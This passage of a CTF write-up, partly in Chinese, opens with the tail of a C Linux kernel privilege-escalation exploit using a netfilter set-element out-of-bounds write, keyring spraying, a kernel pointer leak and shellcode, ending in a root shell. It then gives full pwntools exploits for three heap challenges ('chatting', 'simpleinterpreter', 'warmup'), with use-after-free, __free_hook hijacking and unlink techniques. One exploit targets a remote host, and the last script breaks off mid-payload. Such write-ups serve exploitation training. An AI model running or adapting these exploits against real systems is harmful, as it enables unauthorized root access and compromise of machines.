iov[0].iov_len = nlh_batch_begin->nlmsg_len;
iov[1].iov_base = (void *)nlh_payload;
iov[1].iov_len = nlh_payload->nlmsg_len;
iov[2].iov_base = (void *)nlh_batch_end;
iov[2].iov_len = nlh_batch_end->nlmsg_len;

// 4. Prepare the message to send
memset(&msg, 0, sizeof(struct msghdr));
msg.msg_name = (void *)&dest_snl;
msg.msg_namelen = sizeof(struct sockaddr_nl);
msg.msg_iov = iov;
msg.msg_iovlen = 3;

// Send message
sendmsg(sock, &msg, 0);

// Free allocated memory
free(nlh_batch_end);
free(nlh_payload);
free(nlh_batch_begin);
}

/* add_elem_to_set(): Trigger OOB
* @sock: Socket used to communicate throught the netfilter netlink
* @set_name: Name of the set to add the element
* @set_keylen: Length of the keys of the previous set
* @table_name: Table associated to the preiv
* @id: ID of the previous set
* @data_len: Length of the data to copy. (= Size of the overflow - 16 )
* @data: Data used for the overflow
*
* Submit two elements to add to the set.
* The first one is used to setup the data payload
* The second will trigger the overflow */
void add_elem_to_set(int sock, const char *set_name, uint32_t set_keylen, const char *table_name, uint32_t id, uint32_t data_len, uint8_t *data) {
struct msghdr msg;
struct sockaddr_nl dest_snl;
struct nlmsghdr *nlh_batch_begin;
struct nlmsghdr *nlh_payload;
struct nlmsghdr *nlh_batch_end;
struct nfgenmsg *nfm;
struct nlattr *attr;
uint64_t nlh_payload_size;
uint64_t nested_attr_size;
size_t first_element_size;
size_t second_element_size;
struct iovec iov[3];

// Prepare the netlink sockaddr for msg
memset(&dest_snl, 0, sizeof(struct sockaddr_nl));
dest_snl.nl_family = AF_NETLINK;

// 1. First netlink message: batch
nlh_batch_begin = get_batch_begin_nlmsg();

// 2. Second netlink message : Set attributes
// Precompute the size of the nested field
nested_attr_size = 0;

// First element
nested_attr_size += sizeof(struct nlattr); // Englobing attribute
nested_attr_size += sizeof(struct nlattr); // NFTA_SET_ELEM_KEY
nested_attr_size += NLA_BIN_SIZE(set_keylen); // NFTA_DATA_VALUE
nested_attr_size += sizeof(struct nlattr); // NFTA_SET_ELEM_DATA
nested_attr_size += NLA_ALIGN(NLA_BIN_SIZE(data_len)); // NFTA_DATA_VALUE
first_element_size = nested_attr_size;

// Second element
nested_attr_size += sizeof(struct nlattr); // Englobing attribute
nested_attr_size += sizeof(struct nlattr); // NFTA_SET_ELEM_KEY
nested_attr_size += NLA_BIN_SIZE(set_keylen); // NFTA_DATA_VALUE
nested_attr_size += sizeof(struct nlattr); // NFTA_SET_ELEM_DATA
nested_attr_size += sizeof(struct nlattr); // NFTA_DATA_VERDICT
nested_attr_size += U32_NLA_SIZE; // NFTA_VERDICT_CODE
second_element_size = nested_attr_size - first_element_size;

nlh_payload_size = sizeof(struct nfgenmsg); // Mandatory
nlh_payload_size += sizeof(struct nlattr); // NFTA_SET_ELEM_LIST_ELEMENTS
nlh_payload_size += nested_attr_size; // All the stuff described above
nlh_payload_size += S8_NLA_SIZE; // NFTA_SET_ELEM_LIST_TABLE
nlh_payload_size += S8_NLA_SIZE; // NFTA_SET_ELEM_LIST_SET
nlh_payload_size += U32_NLA_SIZE; // NFTA_SET_ELEM_LIST_SET_ID
nlh_payload_size = NLMSG_SPACE(nlh_payload_size);

// Allocation
nlh_payload = (struct nlmsghdr *)malloc(nlh_payload_size);
if (!nlh_payload)
err_exit("malloc");
memset(nlh_payload, 0, nlh_payload_size);

// Fill the required fields
nlh_payload->nlmsg_len = nlh_payload_size;
nlh_payload->nlmsg_type = (NFNL_SUBSYS_NFTABLES << 8) | NFT_MSG_NEWSETELEM;
nlh_payload->nlmsg_pid = getpid();
nlh_payload->nlmsg_flags = NLM_F_REQUEST;
nlh_payload->nlmsg_seq = 0;

// Setup the nfgenmsg
nfm = (struct nfgenmsg *)NLMSG_DATA(nlh_payload);
nfm->nfgen_family = NFPROTO_INET;

// Setup the attributes
attr = (struct nlattr *)((void *)nlh_payload + NLMSG_SPACE(sizeof(struct nfgenmsg)));
attr = set_str8_attr(attr, NFTA_SET_ELEM_LIST_TABLE, table_name);
attr = set_str8_attr(attr, NFTA_SET_ELEM_LIST_SET, set_name);
attr = set_u32_attr(attr, NFTA_SET_ELEM_LIST_SET_ID, id);
attr = set_nested_attr(attr, NFTA_SET_ELEM_LIST_ELEMENTS, nested_attr_size);

// 2-1 First element
attr = set_nested_attr(attr, 0, first_element_size - 4);
attr = set_nested_attr(attr, NFTA_SET_ELEM_KEY, NLA_BIN_SIZE(set_keylen));
attr = set_binary_attr(attr, NFTA_DATA_VALUE, (uint8_t *)zerobuf, set_keylen);
attr = set_nested_attr(attr, NFTA_SET_ELEM_DATA, NLA_BIN_SIZE(data_len));
attr = set_binary_attr(attr, NFTA_DATA_VALUE, (uint8_t *)data, data_len);

// 2-2 Second element
attr = set_nested_attr(attr, 0, second_element_size - 4);
attr = set_nested_attr(attr, NFTA_SET_ELEM_KEY, NLA_BIN_SIZE(set_keylen));
attr = set_binary_attr(attr, NFTA_DATA_VALUE, (uint8_t *)zerobuf, set_keylen);
attr = set_nested_attr(attr, NFTA_SET_ELEM_DATA, U32_NLA_SIZE + sizeof(struct nlattr));
attr = set_nested_attr(attr, NFTA_DATA_VERDICT, U32_NLA_SIZE);
set_u32_attr(attr, NFTA_VERDICT_CODE, NFT_CONTINUE);

// 3. Last netlink message: End of batch
nlh_batch_end = get_batch_end_nlmsg();

// Setup the iovec
memset(iov, 0, sizeof(struct iovec) * 3);
iov[0].iov_base = (void *)nlh_batch_begin;
iov[0].iov_len = nlh_batch_begin->nlmsg_len;
iov[1].iov_base = (void *)nlh_payload;
iov[1].iov_len = nlh_payload->nlmsg_len;
iov[2].iov_base = (void *)nlh_batch_end;
iov[2].iov_len = nlh_batch_end->nlmsg_len;

// Prepare the message to send
memset(&msg, 0, sizeof(struct msghdr));
msg.msg_name = (void *)&dest_snl;
msg.msg_namelen = sizeof(struct sockaddr_nl);
msg.msg_iov = iov;
msg.msg_iovlen = 3;

// Send message
sendmsg(sock, &msg, 0);

// Free allocated memory
free(nlh_batch_end);
free(nlh_payload);
free(nlh_batch_begin);
}

// ---------------------------------- util --------------------------------------
#define FILENAME_MAX_LEN 0x80

// write_file(): Write a string into a file
void write_file(const char *filename, char *text) {
int fd = open(filename, O_RDWR);
write(fd, text, strlen(text));
close(fd);
}

// new_ns(): Change the current namespace to access to netfilter and to be able to write security xattr in a tmpfs
void new_ns(void) {
uid_t uid = getuid();
gid_t gid = getgid();
char buffer[0x100];

if (unshare(CLONE_NEWUSER | CLONE_NEWNS))
err_exit("unshare(CLONE_NEWUSER | CLONE_NEWNS)");

if (unshare(CLONE_NEWNET))
err_exit("unshare(CLONE_NEWNET)");

write_file("/proc/self/setgroups", "deny");

snprintf(buffer, sizeof(buffer), "0 %d 1", uid);
write_file("/proc/self/uid_map", buffer);
snprintf(buffer, sizeof(buffer), "0 %d 1", gid);
write_file("/proc/self/gid_map", buffer);
}

// set_cpu_affinity(): Pin a process to a CPU
void set_cpu_affinity(int cpu_n, pid_t pid) {
cpu_set_t set;

CPU_ZERO(&set);
CPU_SET(cpu_n, &set);

if (sched_setaffinity(pid, sizeof(set), &set) < 0)
err_exit("sched_setaffinity");
}

int is_keyring_corrupted(key_serial_t *id_buffer, uint32_t id_buffer_size,
key_serial_t *corrupted_key_id) {
uint8_t buffer[CORRUPT_SIZE] = {0};
int32_t keylen;

for (uint32_t i = 0; i < id_buffer_size; i++) {
if (!id_buffer[i]) {
continue;
}

keylen = key_read(id_buffer[i], buffer, CORRUPT_SIZE);
if (keylen < 0)
err_exit("keyctl: %m");

if (keylen == CORRUPT_SIZE) {
*corrupted_key_id = id_buffer[i];
return 1;
}
}
return 0;
}

void key_revokes(key_serial_t *id_buffer, uint32_t id_buffer_size) {
for (uint32_t i = 0; i < id_buffer_size; i++) {
key_revoke(id_buffer[i]);
id_buffer[i] = 0;
}
}

int netfilter_sock = -1;
uint64_t leak_ptr;

void init_netfilter(void) {
struct sockaddr_nl snl;

puts("creating netfilter netlink socket");
if ((netfilter_sock = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_NETFILTER)) < 0) {
err_exit("can't create netfilter socket: %m");
}

memset(&snl, 0, sizeof(snl));
snl.nl_family = AF_NETLINK;
snl.nl_pid = getpid();
if (bind(netfilter_sock, (struct sockaddr *)&snl, sizeof(snl)) < 0) {
err_exit("bind: %m");
}

puts("register netfilter table");
create_table(netfilter_sock, TABLE_NAME);

puts("creating a netfilter set for the info leak");
create_set(netfilter_sock, LEAK_SET_NAME, KMALLOC64_KEYLEN, sizeof(struct leak_payload), TABLE_NAME, ID);

puts("creating a netfilter set for the write primitive");
create_set(netfilter_sock, SET_NAME, KMALLOC64_KEYLEN, sizeof(struct write_payload), TABLE_NAME, ID + 1);
}

void init_namespace(void) {
int fd;
char buff[0x100];

uid_t uid = getuid();
gid_t gid = getgid();

if (unshare(CLONE_NEWUSER | CLONE_NEWNS)) {
err_exit("unshare(CLONE_NEWUSER | CLONE_NEWNS): %m");
}

if (unshare(CLONE_NEWNET)) {
err_exit("unshare(CLONE_NEWNET): %m");
}

fd = open("/proc/self/setgroups", O_WRONLY);
snprintf(buff, sizeof(buff), "deny");
write(fd, buff, strlen(buff));
close(fd);

fd = open("/proc/self/uid_map", O_WRONLY);
snprintf(buff, sizeof(buff), "0 %d 1", uid);
write(fd, buff, strlen(buff));
close(fd);

fd = open("/proc/self/gid_map", O_WRONLY);
snprintf(buff, sizeof(buff), "0 %d 1", gid);
write(fd, buff, strlen(buff));
close(fd);
}

void do_init(void) {
set_cpu_affinity(0, 0);
init_namespace();
init_netfilter();
}

int do_leak(void) {
key_serial_t id_buffer[SPRAY_KEY_CNT] = {0};
key_serial_t corrupted_key_id = 0;

struct leak_payload leak_payload;
memset(&leak_payload, 0, sizeof(struct leak_payload));
leak_payload.len = CORRUPT_SIZE;

retry:
puts("spraying user_key_payload ...");
spray_keyring(id_buffer, SPRAY_KEY_CNT);

puts("free some key to create holes ...");
for (int i = FREE_HOLE_BEGIN; i < SPRAY_KEY_CNT; i += FREE_HOLE_STEP) {
key_revoke(id_buffer[i]);
id_buffer[i] = 0;
}

puts("trigger oob write ...");
add_elem_to_set(netfilter_sock, LEAK_SET_NAME, KMALLOC64_KEYLEN, TABLE_NAME,
ID, sizeof(struct leak_payload), (uint8_t *)&leak_payload);

puts("checking if keyring is corrupted ...");
if (is_keyring_corrupted(id_buffer, SPRAY_KEY_CNT, &corrupted_key_id)) {
printf("found keyring %d is corrupted!\n", corrupted_key_id);
} else {
puts("can't found corrupted keyring, retry ...");
key_revokes(id_buffer, SPRAY_KEY_CNT);
goto retry;
}

puts("free other keyring to set rcu.func in user_key_payload ...");
for (int i = FREE_HOLE_BEGIN; i < SPRAY_KEY_CNT; i++) {
if (id_buffer[i] == corrupted_key_id) {
continue;
}
key_revoke(id_buffer[i]);
id_buffer[i] = 0;
}

puts("searching rcu.func ...");
leak_ptr = get_keyring_leak(corrupted_key_id, CORRUPT_SIZE, 0x4141414141414141); // proc_fs_context_ops
if (!leak_ptr) {
puts("leak rcu.func failed");
for (int i = 0; i < SPRAY_KEY_CNT; i++) {
key_revoke(id_buffer[i]);
id_buffer[i] = 0;
}
return 1;
}

printf("leak user_free_payload_rcu: 0x%08lx\n", leak_ptr);

return 0;
}

#define KMALLOC64_PAGE_CNT ((32 + 8) / 8)

#define PACKET_FENGSHUI_CNT (0x100)
#define PACKET_SPRAY_CNT (0x100)
#define PACKET_FREE_HOLE_STEP (0x20)

int pagealloc_pad(int count, int size) {
return packet_socket_setup(size, 2048, count, 0, 100);
}

int do_write_primitive(void) {
int packet_fds[PACKET_SPRAY_CNT] = {0};
int fengshui_fds[PACKET_FENGSHUI_CNT] = {0};

struct write_payload payload;
memset(&payload, 0, sizeof(struct write_payload));
payload.pg_vec = (void *)(leak_ptr & ~0xfff);
payload.pg_vec2 = payload.pg_vec + PAGE_SIZE;

puts("use raw_packet to fill kmalloc-64 ...");
for (int i = 0; i < PACKET_FENGSHUI_CNT; i++) {
fengshui_fds[i] = pagealloc_pad(KMALLOC64_PAGE_CNT, 0x1000);
}

puts("spraying pg_vec in kmalloc-64 ...");
memset(packet_fds, 0, sizeof(packet_fds));
for (int i = 0; i < PACKET_SPRAY_CNT; i++) {
packet_fds[i] = pagealloc_pad(KMALLOC64_PAGE_CNT, 0x1000);
}

puts("free some pg_vec to create holes ...");
for (int i = 0; i < PACKET_SPRAY_CNT; i += PACKET_FREE_HOLE_STEP) {
close(packet_fds[i]);
packet_fds[i] = 0;
}

puts("trigger oob write ...");

add_elem_to_set(netfilter_sock, SET_NAME, KMALLOC64_KEYLEN, TABLE_NAME,
ID, sizeof(struct write_payload), (uint8_t *)&payload);

puts("searching edited page ...");
for (int i = 0; i < PACKET_SPRAY_CNT; i++) {
if (!packet_fds[i]) {
continue;
}
// packet mmap to userland
char *page = (char *)mmap(NULL, PAGE_SIZE * KMALLOC64_PAGE_CNT,
PROT_READ | PROT_WRITE, MAP_SHARED, packet_fds[i], 0);
if (!page || (ssize_t)page < 0) {
printf("mmap error: %p", page);
continue;
}
// search non-empty page
int j;
for (j = 0x30; j < 0x1000; j++) {
if (page[j] != 0) {
break;
}
}

// found non-empty page
if (j != 0x1000) {
puts("found target page!!");
uint64_t *pos = (uint64_t *)&page[leak_ptr & 0xfff];
uint8_t backup[sizeof(shellcode)] = {0};

puts("write shellcode");

memcpy(backup, pos, sizeof(backup));
memcpy(pos, shellcode, sizeof(shellcode));

// trigger rcu, trigger shellcode
key_serial_t fd = key_alloc("shellcode_trigger", "AAAA",4);
key_revoke(fd);
key_alloc("shellcode_trigger", "AAAA",4);

memcpy(pos, backup, sizeof(backup));
return 0;
}
}

puts("can't found target page");

for (int i = 0; i < PACKET_FENGSHUI_CNT; i++) {
close(fengshui_fds[i]);
}
for (int i = 0; i < PACKET_SPRAY_CNT; i++) {
close(packet_fds[i]);
}

return 1;
}

int main(int argc, char **argv) {
puts("initialize exploit environment ...");
do_init();

while (do_leak()) {
usleep(100 * 1000);
puts("retry ...");
}

kernel_offset = leak_ptr - 0xffffffff81532fb0;
kernel_base = 0xffffffff81000000 + kernel_offset;
printf("kernel_base: 0x%lx\n", kernel_base);
printf("kernel_offset: 0x%lx\n", kernel_offset);

while (do_write_primitive()) {
usleep(100 * 1000);
puts("retry ...");
}

execl("/bin/sh", "sh", NULL);
}

chatting

1
GNU C Library (Ubuntu GLIBC 2.27-3ubuntu1.6) stable release version 2.27.
1
2
3
4
5
6
chatting: ELF 64-bit LSB shared object, x86-64, version 1 (GNU/Linux), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=182890e62a6cb54b4f2f7c6b809f6c43cbb4929a, stripped
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
  • 64位,dynamically,全开

漏洞分析

下面这段代码有逻辑错误:

1
2
3
4
5
6
7
8
9
10
11
12
13
while ( 1 )
{
v7 = (_QWORD *)sub_406A((__int64)&messageg, name);
if ( sub_4838(v7) <= 0x64 )
break;
v4 = std::operator<<<std::char_traits<char>>(&std::cout, "HERE?");
std::ostream::operator<<(v4, &std::endl<char,std::char_traits<char>>);
v5 = sub_406A((__int64)&messageg, name);
v6 = sub_406A((__int64)&messageg, name);
v11 = std::numpunct<wchar_t>::do_truename(v6);
sub_48C2(&v12, (__int64)&v11);
sub_48EC(v5, v12);
}
  • 如果检测到 message 的个数超过 0x64 就会将新创建的 message 释放
  • 但这个被释放的 message 还是会被添加如对应的 vector 中

这就造成了 UAF

入侵思路

先利用堆上遗留的地址泄露 heap_base 和 libc_base

根据程序漏洞,理论上我们拥有 double free 的权利,但 c++ 拥有格外的 tcache 检查,几乎不可能 double free

因此我们需要利用 switch 功能占用 UAF 堆块,二次释放后再用 switch 来修改 tcache

测试代码如下:

1
2
3
4
5
6
7
8
9
10
11
for i in range(0x64):
sleep(0.01)
print(str(i))
message("c"*0x10,0x100,"d"*0x100)
message("c"*0x10,0x50,"k"*0x50)

switch("4"*0x50) # 占用UAF chunk
dele("5"*0x50)
dele("c"*0x10)

switch(p64(free_hook)) # 修改UAF chunk

完整 exp 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
# -*- coding:utf-8 -*-
from pwn import *

arch = 64
challenge = './chatting1'

context.os='linux'
#context.log_level = 'debug'
if arch==64:
context.arch='amd64'
if arch==32:
context.arch='i386'

elf = ELF(challenge)
libc = ELF('libc-2.27.so')

rl = lambda a=False : p.recvline(a)
ru = lambda a,b=True : p.recvuntil(a,b)
rn = lambda x : p.recvn(x)
sn = lambda x : p.send(x)
sl = lambda x : p.sendline(x)
sa = lambda a,b : p.sendafter(a,b)
sla = lambda a,b : p.sendlineafter(a,b)
irt = lambda : p.interactive()
dbg = lambda text=None : gdb.attach(p, text)
# lg = lambda s,addr : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s,addr))
lg = lambda s : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s, eval(s)))
uu32 = lambda data : u32(data.ljust(4, b'x00'))
uu64 = lambda data : u64(data.ljust(8, b'x00'))

b = "set debug-file-directory ./.debug/\n"

local = 0
if local:
p = process(challenge)
#p = gdb.debug(challenge, b)
else:
p = remote('101.200.122.251','14509')

def debug():
#gdb.attach(p)
gdb.attach(p,"b *$rebase(0x04797)\nb *$rebase(0x2B83)\nb *$rebase(0x495E)\n")
#pause()

def cmd(op):
sla(":",op)

def add(name):
cmd("add")
sla("username:",name)

def dele(name):
cmd("delete")
sla("delete:",name)

def show():
cmd("listuser")

def switch(to):
cmd("switch")
sla("to:",to)

def message(to,size,data):
cmd("message")
sla("To:",to)
sla("size:",str(size))
sa("Content",data)

def read():
cmd("read")

#debug()

sla("username:","a"*0x10)
add("1"*0x10)
add("3"*0x400)
add("2")
add("4"*0x10)

message("a"*0x10,0x1,"b")

read()
ru(": ")
ru(": ")
leak_addr = u64(p.recv(6).ljust(8,b"\x00"))
libc_base = leak_addr - 0x3ebc62
success("leak_addr >> "+hex(leak_addr))
success("libc_base >> "+hex(libc_base))

system = libc_base + libc.sym["system"]
free_hook = libc_base + libc.sym["__free_hook"]

dele("4"*0x10)
message("a"*0x10,0x1,"c")
read()
ru(": ")
ru(": ")
ru(": ")
leak_addr = u64(p.recv(6).ljust(8,b"\x00"))
heap_base = leak_addr - 0x1ec63
success("leak_addr >> "+hex(leak_addr))
success("heap_base >> "+hex(heap_base))

add("c"*0x10)
add("4"*0x50)
add("5"*0x50)
add("6"*0x50)
add(p64(free_hook))

sleep(0.2)
for i in range(0x64):
sleep(0.01)
print(str(i))
message("c"*0x10,0x100,"d"*0x100)
message("c"*0x10,0x50,"k"*0x50)

switch("4"*0x50)
dele("5"*0x50)
dele("c"*0x10)
#dele("6"*0x50)

switch(p64(free_hook))
success("free_hook >> "+hex(free_hook))

message("3"*0x400,0x50,p64(system))
message("3"*0x400,0x50,p64(system))
message("3"*0x400,0x50,p64(system))

switch("/bin/sh\x00"*0x20)

p.interactive()

simpleinterpreter

1
GNU C Library (Ubuntu GLIBC 2.27-3ubuntu1.6) stable release version 2.27
1
2
3
4
5
6
simpleinterpreter: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=aab6c7bbf53da3a2a56abc81abda22d25640fc3a, stripped
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
  • 64位,dynamically,全开

入侵思路

一个 C 语言的解释器,参考源码如下:

禁用了 system 但没有禁用 free,因此直接修改 free_hook 即可

完整 exp 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
# -*- coding:utf-8 -*-
from pwn import *

arch = 64
challenge = './simpleinterpreter1'

context.os='linux'
#context.log_level = 'debug'
if arch==64:
context.arch='amd64'
if arch==32:
context.arch='i386'

elf = ELF(challenge)
libc = ELF('libc-2.27.so')

rl = lambda a=False : p.recvline(a)
ru = lambda a,b=True : p.recvuntil(a,b)
rn = lambda x : p.recvn(x)
sn = lambda x : p.send(x)
sl = lambda x : p.sendline(x)
sa = lambda a,b : p.sendafter(a,b)
sla = lambda a,b : p.sendlineafter(a,b)
irt = lambda : p.interactive()
dbg = lambda text=None : gdb.attach(p, text)
# lg = lambda s,addr : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s,addr))
lg = lambda s : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s, eval(s)))
uu32 = lambda data : u32(data.ljust(4, b'x00'))
uu64 = lambda data : u64(data.ljust(8, b'x00'))

b = "set debug-file-directory ./.debug/\n"

local = 1
if local:
p = process(challenge)
#p = gdb.debug(challenge, b)
else:
p = remote('101.200.122.251','13410')

def debug():
#gdb.attach(p)
gdb.attach(p,"b *$rebase(0x034A0)\n")
pause()

def cmd(op):
sla(">",str(op))

def code(payload):
sla( b'Code size: ',str(len(payload)+1))
sa("interpret:",payload)
sn(b'\xff')

payload = '''
void main()
{
int libc_base, system, free_hook;
libc_base = (int)malloc(0x21000) - 0x498010 - 0x19000;
printf("libc_base -> %p", libc_base);
system = libc_base + 0x4f420;
free_hook = libc_base + 0x3ed8e8;
*(int*)free_hook = system;
free("/bin/sh");
}
'''

#debug()
code(payload)

p.interactive()

warmup

1
GNU C Library (Ubuntu GLIBC 2.35-0ubuntu3.5) stable release version 2.35.
1
2
3
4
5
6
warmup: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=b5eb1d744b7c4d95ceafe7ff2e89f659cab2f9bc, for GNU/Linux 3.2.0, stripped
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
  • 64位,dynamically,全开
1
2
3
4
5
6
7
8
9
10
11
12
13
0000: 0x20 0x00 0x00 0x00000004  A = arch
0001: 0x15 0x00 0x09 0xc000003e if (A != ARCH_X86_64) goto 0011
0002: 0x20 0x00 0x00 0x00000000 A = sys_number
0003: 0x15 0x08 0x00 0x00000002 if (A == open) goto 0012
0004: 0x15 0x07 0x00 0x00000000 if (A == read) goto 0012
0005: 0x15 0x06 0x00 0x00000001 if (A == write) goto 0012
0006: 0x15 0x05 0x00 0x0000003c if (A == exit) goto 0012
0007: 0x15 0x04 0x00 0x000000e7 if (A == exit_group) goto 0012
0008: 0x15 0x03 0x00 0x00000009 if (A == mmap) goto 0012
0009: 0x15 0x02 0x00 0x0000000a if (A == mprotect) goto 0012
0010: 0x15 0x01 0x00 0x0000000c if (A == brk) goto 0012
0011: 0x06 0x00 0x00 0x00000000 return KILL
0012: 0x06 0x00 0x00 0x7fff0000 return ALLOW

漏洞分析

有 off-by-one 漏洞:

1
chunk_list[i][(int)read(0, chunk_list[i], size)] = 0;

入侵思路

核心考点为无泄露 unlink attack,可以考虑如下的堆风水:

  • 获取两个 unsorted chunk 进行合并,其中的第二个 chunk 末地址必须为 \x00(遗留下 FD BK 指针)
  • 重新申请大 unsorted chunk 后释放(不破坏原来的 heap 结构),然后再次进行分割,使第二个 chunk 的末尾地址为 \x30 或者 \x40 \x50 等等(有一定偏移的地址都可以)
  • 之后利用 unsortedbin 进行调整,在 FD->bk 和 BK->fd 中写入 \x30,然后覆盖为 \x00

由于该程序至少覆盖两字节,因此打 unlink 时只有 1/16 的概率可以打通(如果有更好的堆风水可以避免这一点)

最后劫持 stderr 打 house of cat 即可

完整 exp 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
# -*- coding:utf-8 -*-
from pwn import *

arch = 64
challenge = './warmup1'

context.os='linux'
context.log_level = 'debug'
if arch==64:
context.arch='amd64'
if arch==32:
context.arch='i386'

elf = ELF(challenge)
libc = ELF('libc.so.6')

rl = lambda a=False : p.recvline(a)
ru = lambda a,b=True : p.recvuntil(a,b)
rn = lambda x : p.recvn(x)
sn = lambda x : p.send(x)
sl = lambda x : p.sendline(x)
sa = lambda a,b : p.sendafter(a,b)
sla = lambda a,b : p.sendlineafter(a,b)
irt = lambda : p.interactive()
dbg = lambda text=None : gdb.attach(p, text)
# lg = lambda s,addr : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s,addr))
lg = lambda s : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s, eval(s)))
uu32 = lambda data : u32(data.ljust(4, b'x00'))
uu64 = lambda data : u64(data.ljust(8, b'x00'))

b = "set debug-file-directory ./.debug/\n"
"""
local = 1
if local:
p = process(challenge)
#p = gdb.debug(challenge, b)
else:
p = remote('119.13.105.35','10111')
"""
def debug():
gdb.attach(p,"")
#gdb.attach(p,"b *$rebase()\n")
#pause()

def cmd(op):
sla(">>",str(op))

def add(size,data="\n"):
cmd(1)
sla("Size",str(size))
sa("Note",data)

def show(index):
cmd(2)
sla("Index",str(index+1))

def dele(index):
cmd(3)
sla("Index",str(index+1))


#debug()
def pwn():
add(0x52f0) #null
add(0x418) #0
add(0x1f0) #1
add(0x428) #2
add(0x438) #3
add(0x208) #4
add(0x428) #5
add(0x208) #6

dele(0)
dele(3)
dele(5)
dele(2)

sleep(0.1)
add(0x440,0x428*'a'+p32(0xc91)) #0
add(0x418) #3 0x2b0

add(0x418,"\x00") #2 0xd20 - over \x00 to bk/fd
add(0x428) #5 0x370

dele(3) # 0x2b0 - bk=0xd20
dele(2) # 0xd20

add(0x418,'a'*8) #2 修复fd->bk(低位覆盖\x00)
add(0x418) #3

dele(3) # 0xd20
dele(5) # 0x350 - fd=0xd20

add(0x9f8) #3 make 0x350 to large
add(0x428,'\x00') #5 修复bk->fd(低位覆盖\x00)

dele(6)
sleep(0.1)
add(0x208,0x200*'a'+p64(0xc90))

add(0x418) #7
add(0x208) #8

sleep(0.1)
dele(3) # unlink

add(0x430,flat(0,0,0,p64(0x421))) #3
add(0x1600) #9

show(4)
ru("Note: ")
leak_addr=u64(p.recv(6).ljust(8,'\x00'))
libc_base=leak_addr-0x21a310
success("leak_addr >> "+hex(leak_addr))
success("libc_base >> "+hex(libc_base))

show(5)
ru("Note: ")
leak_addr=u64(p.recv(6).ljust(8,'\x00'))
heap=leak_addr-0x55b0
success("leak_addr >> "+hex(leak_addr))
success("heap_base >> "+hex(heap))

setcontext=libc_base+libc.sym['setcontext']+61
open_libc=libc_base+libc.sym['open']
read_libc=libc_base+libc.sym['read']
write_libc=libc_base+libc.sym['write']
success("setcontext >> "+hex(setcontext))

IO_list_all = libc_base+0x21a680
stderr=libc_base+libc.sym['stderr']
stderr = libc_base+libc.sym['stderr']
IO_wfile_jumps = libc_base+libc.sym['_IO_wfile_jumps']
_IO_stdfile_2_lock = libc_base+0x21ba60
success("IO_list_all >> "+hex(IO_list_all))
success("stderr >> "+hex(stderr))
success("IO_wfile_jumps >> "+hex(IO_wfile_jumps))

pop_rax_ret=0x0000000000045eb0+libc_base
pop_rdi_ret=0x000000000002a3e5+libc_base
pop_rsi_ret=0x000000000002be51+libc_base
pop_rdx_ret=0x00000000000796a2+libc_base
ret=0x0000000000029cd6+libc_base
syscall_ret = 0x0000000000114059+libc_base
success("pop_rdi_ret >> "+hex(pop_rdi_ret))
success("pop_rsi_ret >> "+hex(pop_rsi_ret))
success("pop_rdx_ret >> "+hex(pop_rdx_ret))
success("ret >> "+hex(ret))

next_chain = 0
fake_io_addr = heap + 0x6650 - 0x10
payload_addr = heap
success("fake_io_addr >> "+hex(fake_io_addr))

ORW_addr = heap + 0x5be0
flag_addr = heap + 0x5be0 + 0x200

fake_IO_FILE = "/bin/sh\x00" #_flags=rdi
fake_IO_FILE += p64(0)*5
fake_IO_FILE += p64(1)+p64(2) # rcx!=0(FSOP)
fake_IO_FILE += p64(ORW_addr-0xa0) #_IO_backup_base=rdx
fake_IO_FILE += p64(setcontext) #_IO_save_end=call addr(call setcontext/system)
fake_IO_FILE = fake_IO_FILE.ljust(0x58, '\x00')
fake_IO_FILE += p64(0) # _chain
fake_IO_FILE = fake_IO_FILE.ljust(0x78, '\x00')
